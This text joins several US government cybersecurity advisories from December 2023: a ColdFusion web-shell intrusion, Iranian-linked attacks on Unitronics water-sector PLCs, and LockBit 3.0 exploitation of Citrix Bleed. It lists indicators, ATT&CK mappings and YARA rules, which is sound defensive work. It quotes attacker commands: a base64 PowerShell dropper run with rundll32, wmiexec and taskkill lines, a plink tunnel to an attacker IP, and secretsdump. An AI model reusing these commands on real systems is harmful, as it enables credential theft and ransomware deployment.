commands. The threat actors also collected information about local [T1087.001] and domain [T1087.002] administrative user accounts while performing reconnaissance by using commands such as localgroup
, net user
, net user /domain
, and ID
. Host and network reconnaissance efforts were further conducted to discover network configuration, time logs, and query user information.
Threat actors were observed dropping the file d.txt
—decoded as d.jsp
—via POST command in addition to eight malicious artifacts (hiddenfield.jsp
, hiddenfield_jsp.class
, hiddenfield_jsp.java
, Connection.jsp
, Connection_jsp.class
, Connection_jsp.java
, d_jsp.class
, and d_jsp.java/
). According to open source information, d.jsp
is a remote access trojan (RAT) that utilizes a JavaScript loader [T1059.007] to infect the device and requires communication with the actor-controlled server to perform actions.[4] The agency’s analysis identified the trojan as a modified version of a publicly available web shell code.[5] After maintaining persistence, threat actors periodically tested network connectivity by pinging Google’s domain name system (DNS) [T1016.001]. The threat actors conducted additional reconnaissance efforts via searching for the .jsp
files that were uploaded.
Threat actors attempted to exfiltrate the (Registry) files sam.zip
, sec.zip
, blank.jsp
, and cf-bootstrap.jar
. Windows event logs identified the actors were not successful due to the malicious activity being detected and quarantined. An additional file (sys.zip
) was created on the system; however, there were no indications of any attempt to exfiltrate it. Analysis identified these files resulted from executed save and compress data processes from the HKEY_LOCAL_MACHINE (HKLM) Registry key, as well as save security account manager (SAM) [T1003.002] information to .zip files. The SAM Registry file may allow for malicious actors to obtain usernames and reverse engineer passwords; however, no artifacts were available to confirm that the threat actors were successful in exfiltrating the SAM Registry hive.
Windows event logs show that a malicious file (1.dat
) was detected and quarantined. Analysis determined this file was a local security authority subsystem service (LSASS) dump [T1003.001] file that contained user accounts—to include multiple disabled credentials—and Windows new technology LAN manager (NTLM) passwords. The accounts were found on multiple servers across the victim’s network and were not successfully used for lateral movement.
As efforts for reconnaissance continued, the threat actors changed their approach to using security tools that were present on the victim server. Esentutl.exe
[6] was used to attempt this registry dump. Attempts to download data from the threat actors’ command and control (C2) server were also observed but blocked and logged by the victim server. Threat actors further attempted to access SYSVOL, which is used to deliver policy and logon scripts to domain members on an agency domain controller [T1484.001]. The attempt was unsuccessful. Had the attempt succeeded, the threat actors may have been able to change policies across compromised servers.[7]
Note: During this incident, analysis strongly suggests that the threat actors likely viewed the data contained in the ColdFusion seed.properties file via the web shell interface. The seed.properties file contains the seed value and encryption method used to encrypt passwords. The seed values can also be used to decrypt passwords. No malicious code was found on the victim system to indicate the threat actors attempted to decode any passwords using the values found in seed.properties file. Versions of ColdFusion 9 or greater use the seed.properties file, which contains unique seed values that can only be used on a single server.
See Tables 2-9 for all referenced threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title |
ID |
Use |
---|---|---|
Exploit Public-Facing Application |
Threat actors exploited two public-facing web servers running outdated versions of Adobe ColdFusion. |
Technique Title |
ID |
Use |
---|---|---|
Command and Scripting Interpreter: JavaScript |
In correlation with open source information, analysis determined |
Technique Title |
ID |
Use |
---|---|---|
Server Software Component: Web Shell |
Threat actors uploaded various web shells to enable remote code execution and to execute commands on compromised web servers. |
Technique Title |
ID |
Use |
---|---|---|
Domain Policy Modification: Group Policy Modification |
Threat actors attempted to edit SYSVOL on an agency domain controller to change policies. |
Technique Title |
ID |
Use |
---|---|---|
Masquerading: Match Legitimate Name or Location |
Threat actors inserted malicious code with the intent to extract username, password, and data source URLs into |
|
Masquerading: Masquerade File Type |
Threat actors used the .txt file extension to disguise malware files. |
|
Indicator Removal: File Deletion |
Threat actors deleted files following upload to remove malicious indicators. |
|
Deobfuscate/Decode Files or Information |
Threat actors used |
|
Hide Artifacts: Hidden Files and Directories |
Threat actors attempted to run |
Technique Title |
ID |
Use |
---|---|---|
OS Credential Dumping: LSASS Memory |
Threat actors attempted to harvest user account credentials through LSASS memory dumping. |
|
OS Credential Dumping: Security Account Manager |
Threat actors saved and compressed SAM information to .zip files. |
Technique Title |
ID |
Use |
System Network Configuration Discovery: Internet Connection Discovery |
Threat actors periodically tested network connectivity by pinging Google’s DNS. |
|
Network Service Discovery |
Threat actors scanned at least three subnets to gather network information using |
|
System Information Discovery |
Threat actors collected information about the web server and its operating system. |
|
File and Directory Discovery |
Threat actors traversed and were able to search through folders on the victim’s web server filesystem. Additional reconnaissance efforts were conducted via searching for the |
|
Account Discovery: Local Account |
Threat actors collected information about local user accounts. |
|
Account Discovery: Domain Account |
Threat actors collected information about domain users, including identification of domain admin accounts. |
|
Domain Trust Discovery |
Threat actors enumerated domain trusts to identify lateral movement opportunities. |
|
Software Discovery |
Following initial access and enumeration, threat actors checked for the presence of ColdFusion version 2018 on the victim web server. |
Technique Title |
ID |
Use |
---|---|---|
Application Layer Protocol: Web Protocols |
Threat actors used HTTP POST requests to |
|
Ingress Tool Transfer |
Threat actors were able to upload malicious artifacts to the victim web server. |
CISA recommends organizations implement the mitigations below to improve your organization’s cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
These mitigations apply to all critical infrastructure organizations and network defenders. CISA recommends that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices, limiting the impact of threat actor techniques and strengthening the security posture for their customers. For more information on secure by design, see CISA’s Secure by Design webpage.
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Packet Storm Security: Adobe ColdFusion Unauthenticated Remote Code Execution
[2] MITRE: certutil
[3] VirusTotal: File - a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
[4] Bleeping Computer: Stealthy New JavaScript Malware Infects Windows PCs with RATs
[5] GitHub: Tas9er/ByPassGodzilla
[6] MITRE: esentutl
[7] Microsoft: Active Directory - SYSVOL
[8] Microsoft: Restrict NTLM - Incoming NTLM Traffic
The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.
December 5, 2023: Initial version.
]]>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), and the Israel National Cyber Directorate (INCD)—hereafter referred to as "the authoring agencies"—are disseminating this joint Cybersecurity Advisory (CSA) to highlight continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat (APT) cyber actors.
The IRGC is an Iranian military organization that the United States designated as a foreign terrorist organization in 2019. IRGC-affiliated cyber actors using the persona “CyberAv3ngers” are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs). These PLCs are commonly used in the Water and Wastewater Systems (WWS) Sector and are additionally used in other industries including, but not limited to, energy, food and beverage manufacturing, and healthcare. The PLCs may be rebranded and appear as different manufacturers and companies. In addition to the recent CISA Alert, the authoring agencies are releasing this joint CSA to share indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with IRGC cyber operations.
Since at least November 22, 2023, these IRGC-affiliated cyber actors have continued to compromise default credentials in Unitronics devices. The IRGC-affiliated cyber actors left a defacement image stating, “You have been hacked, down with Israel. Every equipment ‘made in Israel’ is CyberAv3ngers legal target.” The victims span multiple U.S. states. The authoring agencies urge all organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors.
This advisory provides observed IOCs and TTPs the authoring agencies assess are likely associated with this IRGC-affiliated APT. For more information on Iranian state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and the FBI’s Iran Threat webpage.
For a PDF version of this CSA, see:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See Table 1 for threat actor activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
CyberAv3ngers (also known as CyberAveng3rs, Cyber Avengers) is an Iranian IRGC cyber persona that has claimed responsibility for numerous attacks against critical infrastructure organizations.[1],[2],[3],[4],[5] The group claimed responsibility for cyberattacks in Israel beginning in 2020. CyberAv3ngers falsely claimed they compromised several critical infrastructure organizations in Israel.[2] CyberAv3ngers also reportedly has connections to another IRGC-linked group known as Soldiers of Solomon.
Most recently, CyberAv3ngers began targeting U.S.-based WWS facilities that operate Unitronics PLCs.[1] The threat actors compromised Unitronics Vision Series PLCs with human machine interfaces (HMI). These compromised devices were publicly exposed to the internet with default passwords and by default are on TCP port 20256.
These PLC and related controllers are often exposed to outside internet connectivity due to the remote nature of their control and monitoring functionalities. The compromise is centered around defacing the controller’s user interface and may render the PLC inoperative. With this type of access, deeper device and network level accesses are available and could render additional, more profound cyber physical effects on processes and equipment. It is not known if additional cyber activities deeper into these PLCs or related control networks and components were intended or achieved. Organizations should consider and evaluate their systems for these possibilities.
The authoring agencies have observed the IRGC-affiliated activity since at least October 2023, when the actors claimed credit for the cyberattacks against Israeli PLCs on their Telegram channel. Since November 2023, the authoring agencies have observed the IRGC-affiliated actors target multiple U.S.-based WWS facilities that operate Unitronics Vision Series PLCs. Cyber threat actors likely compromised these PLCs since the PLCs were internet-facing and used Unitronics’ default password. Observed activity includes the following:
See Table 1 for observed IOCs related to CyberAv3nger operations.
Indicator |
Type |
Fidelity |
Description |
BA284A4B508A7ABD8070A427386E93E0 |
MD5 |
Suspected |
MD5 hash associated with Crucio Ransomware |
66AE21571FAEE1E258549078144325DC9DD60303
|
SHA1 |
Suspected |
SHA1 hash associated with Crucio Ransomware |
440b5385d3838e3f6bc21220caa83b65cd5f3618daea676f271c3671650ce9a3
|
SHA256
|
Suspected |
SHA256 hash associated with Crucio Ransomware
|
178.162.227[.]180 |
IP address |
|
|
185.162.235[.]206 |
IP address |
|
|
See Table 2 for referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Brute Force Techniques |
Threat actors obtained login credentials, which they used to successfully log into Unitronics devices and provide root-level access. |
The authoring agencies recommend critical infrastructure organizations, including WWS sector facilities, implement the following mitigations to improve your organization’s cybersecurity posture to defend against CyberAv3ngers activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Note: The below mitigations are based on threat actor activity against Unitronics PLCs but apply to all internet-facing PLCs.
The cyber threat actors likely accessed the affected devices—Unitronics Vision Series PLCs with HMI—by exploiting cybersecurity weaknesses, including poor password security and exposure to the internet. To safeguard against this threat, the authoring agencies urge organizations to consider the following:
Immediate steps to prevent attack:
Follow-on steps to strengthen your security posture:
In addition, the authoring agencies recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by cyber threat actors:
Although critical infrastructure organizations using Unitronics (including rebranded Unitronics) PLC devices can take steps to mitigate the risks, it is ultimately the responsibility of the device manufacturer to build products that are secure by design and default. The authoring agencies urge device manufacturers to take ownership of the security outcomes of their customers by following the principles in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software, primarily:
By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates.
For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
All organizations should report suspicious or criminal activity related to information in this CSA to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or IC3.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
Additionally, the WaterISAC encourages members to share information by emailing analyst@waterisac.org, calling 866-H2O-ISAC, or using the online incident reporting form. State, local, tribal, and territorial governments should report incidents to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).
The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.
December 1, 2023: Initial version.
]]>Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.
This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization.
Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPs.
Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. Through the takeover of legitimate user sessions, malicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources.
CISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA, which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge Center.
The authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations. If no compromise is detected, organizations should immediately apply patches made publicly available.
For the associated Malware Analysis Report (MAR), see: MAR-10478915-1.v1 Citrix Bleed
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
CVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0 ransomware affiliates, the capability to bypass MFA [T1556.006] and hijack legitimate user sessions [T1563].
After acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler appliance without a username, password, or access to MFA tokens [T1539]. Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information [T1082]. The information obtained through this exploit contains a valid NetScaler AAA session cookie.
Citrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, within their Citrix Security Bulletin, which issued guidance, and detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of active exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEVs) Catalog. This critical vulnerability exploit impacts the following software versions [1]:
Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks.
Malware identified in this campaign is generated beginning with the execution of a PowerShell script (123.ps1
) which concatenates two base64 strings together, converts them to bytes, and writes them to the designated file path.
$y = "TVqQAAMA..." $x = "RyEHABFQ..." $filePath = "C:UsersPublicadobelib.dll" $fileBytes = [System.Convert]::FromBase64String($y + $x) [System.IO.File]::WriteAllBytes($filePath, $fileBytes) |
The resulting file (adobelib.dll
) is then executed by the PowerShell script using rundll32
.
rundll32 C:UsersPublicadobelib.dll,main
The Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the DLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses 172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. Although adobelib.dll and the adobe-us-updatefiles[.]digital have the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified interaction with the software.
Other observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example, LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring (RMM), Batch and PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe and other common software tools typically associated with ransomware incidents.
See Table 1–Table 5 for IOCs related to Lockbit 3.0 affiliate exploitation of CVE-2023-4966.
[Fidelity] Legend:
Low confidence indicators may not be related to ransomware.
Indicator |
Type |
Fidelity |
Description |
---|---|---|---|
192.229.221[.]95 |
IP |
Low |
Mag.dll calls out to this IP address. Ties back to dns0.org. Should run this DLL in a sandbox, when possible, to confirm C2. IP is shared hosting. |
123.ps1 |
PowerShell script |
High |
Creates and executes payload via script. |
193.201.9[.]224 |
IP |
High |
FTP to Russian geolocated IP from compromised system |
62.233.50[.]25 |
IP |
High |
Russian geolocated IP from compromised system Hxxp://62.233.50[.]25/en-us/docs.html Hxxp://62.233.50[.]25/en-us/test.html |
51.91.79[.].17 |
IP |
Med |
Temp.sh IP |
Teamviewer |
Tool (Remote Admin) |
Low |
|
70.37.82[.]20 |
IP |
Low |
IP was seen from a known compromised account reaching out to an Altera IP address. LockBit is known to leverage Altera, a remote admin tool, such as Anydesk, team viewer, etc. |
185.17.40[.]178 |
IP |
Low |
Teamviewer C2, ties back to a polish service provider, Artnet Sp. Zo.o. Polish IP address |
Indicator |
Type |
Fidelity |
Description |
---|---|---|---|
185.229.191.41 |
Anydesk Usage |
High |
Anydesk C2 |
81.19.135[.]219 |
IP |
High |
Russian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta Hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta |
45.129.137[.]233 |
IP |
Medium |
Callouts from known compromised device beginning during the compromised window. |
185.229.191[.]41 |
Anydesk Usage |
High |
Anydesk C2 |
Plink.exe |
Command interpreter |
High |
Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows. |
AnyDeskMSI.exe |
Remote admin tool |
High |
We do see that AnyDeskMSI.exe was installed as a service with "auto start" abilities for persistence. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently. |
SRUtility.exe |
Splashtop utility |
|
9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a |
Netscan exe |
Network scanning software |
High |
498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155 |
Indicator |
Type |
Fidelity |
Description |
---|---|---|---|
Scheduled task: MEGAMEGAcmd |
Persistence
|
High |
|
Scheduled task: UpdateAdobeTask |
Persistence |
High |
|
Mag.dll |
Persistence |
High |
Identified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63
|
123.ps1 |
Script |
High |
Creates rundll32 C:UsersPublicadobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44
|
Adobelib.dll |
Persistence |
Low |
C2 from adobelib.dll. |
Adobe-us-updatefiles[.]digital |
Tool Download |
High |
Used to download obfuscated toolsets |
172.67.129[.]176 |
Tool Download |
High |
IP of adobe-us-updatefiles[.]digital |
104.21.1[.]180 |
Tool Download |
High |
Adobe-us-updatefiles[.]digital |
cmd.exe /q /c cd 1> \127.0.0.1admin$__1698617793[.]44 2>&1
|
Command |
High |
wmiexec.exe usage
|
cmd.exe /q /c cd 1> \127.0.0.1admin$__1698617793[.]44 2>&1
|
Command |
High |
wmiexec.exe usage
|
cmd.exe /q /c query user 1> \127.0.0.1admin$__1698617793[.]44 2>&1
|
Command |
High |
wmiexec.exe usage
|
cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex
|
Command |
High |
wmiexec.exe usage
|
cmd.exe /q /c cd 1> \127.0.0.1admin$__1698618133[.]54 2>&1
|
Command |
High |
wmiexec.exe usage
|
cmd.exe /q /c cd 1> \127.0.0.1admin$__1698618203[.]51 2>&1
|
Command |
High |
|
The authoring organizations recommended monitoring/reviewing traffic to the 81.19.135[.]*
class C network and review for MSHTA being called with HTTP arguments [3].
Indicator |
Type |
Fidelity |
Description |
Notes |
---|---|---|---|---|
81.19.135[.]219
|
IP |
High |
Russian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7.hta |
|
81.19.135[.]220
|
IP |
High |
Russian geolocated IP, seen outbound in logs |
IP registered to a South African Company |
81.19.135[.]226
|
IP |
High |
Russian geolocated IP, seen outbound in logs |
IP registered to a South African Company |
Type |
Indicator |
Description |
---|---|---|
Filename |
c:usersdownloadsprocess hacker 2peview.exe |
Process hacker |
Filename |
c:usersmusicprocess hacker 2processhacker.exe |
Process hacker |
Filename |
psexesvc.exe |
Psexec service excutable |
Filename |
c:perflogsprocesshacker.exe |
Process hacker |
Filename |
c:windowstempscreenconnect23.8.5.8707filesprocesshacker.exe |
Process hacker transferred via screenconnect |
Filename |
c:perflogslsass.dmp |
Lsass dump |
Filename |
c:usersdownloadsmimikatz.exe |
Mimikatz |
Filename |
c:usersdesktopproc64proc.exe |
Procdump |
Filename |
c:usersdocumentsveeam-get-creds.ps1 |
Decrypt veeam creds |
Filename |
secretsdump.py |
Impacket installed on azure vm |
Cmdline |
secretsdump.py /@ -outputfile 1 |
Impacket installed on azure vm |
Filename |
ad.ps1 |
Adrecon found in powershell transcripts |
Filename |
c:perflogs64-bitnetscan.exe |
Softperfect netscan |
Filename |
tniwinagent.exe |
Total network inventory agent |
Filename |
psexec.exe |
Psexec used to deploy screenconnect |
Filename |
7z.exe |
Used to compress files |
Tool |
Action1 |
RMM |
Tool |
Atera |
RMM |
tool |
anydesk |
rmm |
tool |
fixme it |
rmm |
tool |
screenconnect |
rmm |
tool |
splashtop |
rmm |
tool |
zoho assist |
rmm |
ipv4 |
101.97.36[.]61 |
zoho assist |
ipv4 |
168.100.9[.]137 |
ssh portforwarding infra |
ipv4 |
185.20.209[.]127 |
zoho assist |
ipv4 |
185.230.212[.]83 |
zoho assist |
ipv4 |
206.188.197[.]22 |
powershell reverse shell seen in powershell logging |
ipv4 |
54.84.248[.]205 |
fixme ip |
Ipv4 |
141.98.9[.]137 |
Remote IP for CitrixBleed |
domain |
assist.zoho.eu |
zoho assist |
filename |
c:perflogs1.exe |
connectwise renamed |
filename |
c:perflogsrun.exe |
screenconnect pushed by psexec |
filename |
c:perflogs64-bitm.exe |
connectwise renamed |
filename |
c:perflogs64-bitm0.exe |
connectwise renamed |
filename |
c:perflogsza_access_my_department.exe |
zoho remote assist |
filename |
c:usersmusicza_access_my_department.exe |
zoho remote assist |
filename |
c:windowsservicehost.exe |
plink renamed |
filename |
c:windowssysconf.bat |
runs servicehost.exe (plink) command |
filename |
c:windowstempscreenconnect23.8.5.8707filesazure.msi |
zoho remote assist used to transfer data via screenconnect |
cmdline |
echo enter | c:windowsservicehost.exe -ssh -r 8085:127.0.0.1:8085 @168.100.9[.]137 -pw |
plink port forwarding |
domain |
eu1-dms.zoho[.]eu |
zoho assist |
domain |
fixme[.]it |
fixme it |
domain |
unattended.techninline[.]net |
fixme it |
See Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
System Information Discovery |
Threat actors will attempt to obtain information about the operating system and hardware, including versions, and patches. |
Technique Title |
ID |
Use |
---|---|---|
Modify Authentication Process: Multifactor Authentication |
Threat actors leverage vulnerabilities found within CVE- to compromise, modify, and/or bypass multifactor authentication to hijack user sessions, harvest credentials, and move laterally, which enables persistent access. |
|
Steal Web Session Cookie |
Threat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username, password, or access to multifactor authentication (MFA) tokens. |
Network defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt for suspicious activity such as installing tools on the system (e.g., putty, rClone ), new account creation, log item failure, or running commands such as hostname, quser, whoami, net, and taskkill. Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection.
For IP addresses:
Note: MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a token/session for an already authenticated user.
The following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity:
tf0gYx2YI
for identifying LockBit encrypted files.C:Temp
directory for loading and the execution of files.Below, are CISA developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler logs or additional resources, visit CISA’s Malware Analysis Report (MAR) MAR-10478915-1.v1 Citrix Bleed or the resource section of this CSA [2]:
CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM). The files include:
rule CISA_10478915_01 : trojan installs_other_components { meta: author = "CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities = "installs-other-components" malware_Type = "trojan" tool_type = "information-gathering" description = "Detects trojan .bat samples" sha256 = "98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9" strings: $s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 } $s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 65 6d } $s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 } condition: all of them } |
This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named 'z.txt' located in the path C:WindowsTasks. Next, a.bat pings the loop back internet protocol (IP) address 127.0.0[.]1 three times.
The next command it runs is reg save to save the HKLMSYSTEM registry hive into the C:Windowstasksem directory. Again, a.bat pings the loop back address 127.0.0[.]1 one time before executing another reg save command and saves the HKLMSAM registry hive into the C:WindowsTaskam directory. Next, a.bat runs three makecab commands to create three cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:UsersPublica.png. The names of the .cab files are as follows:
rule CISA_10478915_02 : trojan installs_other_components { meta: author = "CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities = "installs-other-components" malware_type = "trojan" tool_type = "unknown" description = "Detects trojan PE32 samples" sha256 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068" strings: $s1 = { 57 72 69 74 65 46 69 6c 65 } $s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 } $s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 } $s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 } $s5 = { 64 65 6c 65 74 65 5b 5d } $s6 = { 4e 41 4e 28 49 4e 44 29 } condition: uint16(0) == 0x5a4d and pe.imphash() == "6e8ca501c45a9b85fff2378cffaa24b2" and pe.size_of_code == 84480 and all of them } |
